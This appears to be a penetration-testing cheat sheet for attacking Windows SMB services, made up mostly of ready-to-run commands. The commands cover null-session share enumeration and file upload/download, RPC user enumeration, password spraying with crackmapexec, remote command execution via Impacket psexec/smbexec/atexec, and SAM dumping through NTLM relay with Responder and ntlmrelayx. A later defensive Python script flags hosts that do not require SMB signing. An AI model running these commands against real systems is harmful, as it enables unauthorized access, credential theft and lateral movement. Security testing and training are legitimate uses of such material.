🦁SMB

Enumeration

sudo nmap IP -sV -sC -p139,445

Anonymous Authentication

smbclient -N -L //IP
  • -L List shares

  • -N Uses null session

smbmap -H IP
smbmap -H IP -r SHARENAME
smbmap -H IP --download "notes\note.txt"
smbmap -H IP --upload test.txt "notes\test.txt"
  • --download Path of the remote file to fetch (share name first, then the path inside it)

  • --upload Local source file followed by the remote destination path

RPC Remote Procedure Call

rpcclient -U'%' IP
> enumdomusers
./enum4linux-ng.py 10.10.11.45 -A -C

Password Attacks

CME Password Spraying

Use --local-auth when the target is not domain-joined (authentication is checked against the machine's local accounts rather than the domain).

crackmapexec smb IP -u userlist.txt -p 'password!' --local-auth

The --continue-on-success flag keeps spraying the rest of the list even after a valid password is found.

RCE - Remote Code Execution

PsExec lets us execute processes on remote systems, including a fully interactive console, without manually installing any software on the target.

Impacket PsExec

impacket-psexec administrator:'password!'@IP
impacket-smbexec administrator:'password!'@IP
impacket-atexec administrator:'password!'@IP

CME Command Execution

crackmapexec smb 10.10.110.17 -u Administrator -p 'password' -x 'whoami' --exec-method smbexec
  • -x Run a command

  • -X Run PowerShell commands

CME Enumerating Users Logged In

crackmapexec smb 10.10.110.17 -u Administrator -p 'password' --loggedon-users

Remote Dumping

Forced Authentication

SMB Relays

responder -I <interface name>

Impacket-ntlmrelayx

Disable Responder's own SMB server first, so that ntlmrelayx can listen on port 445 instead:

## /etc/responder/Responder.conf
SMB = Off

Dump the SAM database (the default action when no command is given)

impacket-ntlmrelayx --no-http-server -smb2support -t IP
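The relay above only succeeds against hosts that accept unsigned SMB sessions, so the defensive counterpart is an audit of which servers do not require message signing. The script below is an added example written for this page, not part of the original cheat sheet or of Impacket; it parses the text output of nmap's smb2-security-mode script (the sample output is constructed in that script's format, with hostnames and addresses invented) and lists the hosts where signing is not enforced, i.e. the ones to remediate with the "Microsoft network server: Digitally sign communications (always)" policy.

```python
import re

# Constructed sample in the shape of `nmap -p445 --script smb2-security-mode`
# output; the hosts and addresses are invented for this example.
SAMPLE_NMAP = """\
Nmap scan report for fileserver.example.local (10.10.110.17)
Host is up (0.0010s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required

Nmap scan report for dc01.example.local (10.10.110.10)
Host is up (0.0012s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required

Nmap scan report for legacy.example.local (10.10.110.23)
Host is up (0.0020s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb2-security-mode: 
|   2.1: 
|_    Message signing enabled but not required
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
MODE_RE = re.compile(r"^\|_?\s+Message signing (.+?)\s*$")

# The only state that defeats relaying: the server refuses unsigned sessions.
SAFE_MODE = "enabled and required"


def parse_signing(text):
    """Return {host: signing_mode} from nmap's normal (non-XML) output.
    Hosts that report no smb2-security-mode line are left out."""
    results = {}
    host = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)   # hostname, or the IP if nmap had no reverse DNS
            continue
        m = MODE_RE.match(line)
        if m and host is not None:
            results[host] = m.group(1)
    return results


def relay_exposed(results):
    """Hosts whose signing mode is anything other than 'enabled and required'."""
    return sorted(host for host, mode in results.items() if mode != SAFE_MODE)


if __name__ == "__main__":
    modes = parse_signing(SAMPLE_NMAP)
    for host in relay_exposed(modes):
        print(f"{host}: signing {modes[host]} -> relayable, require signing")
```

Run against a real scan, the same parser works on output saved with `-oN`; for large estates the XML output with `-oX` is easier to consume, but the signing state string the script matches is the same. Domain controllers require signing by default, which is why dc01 is not listed, while member servers and workstations only advertise it unless the policy above is applied to them too.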

Latest Vulnerabilities

SMBGhost
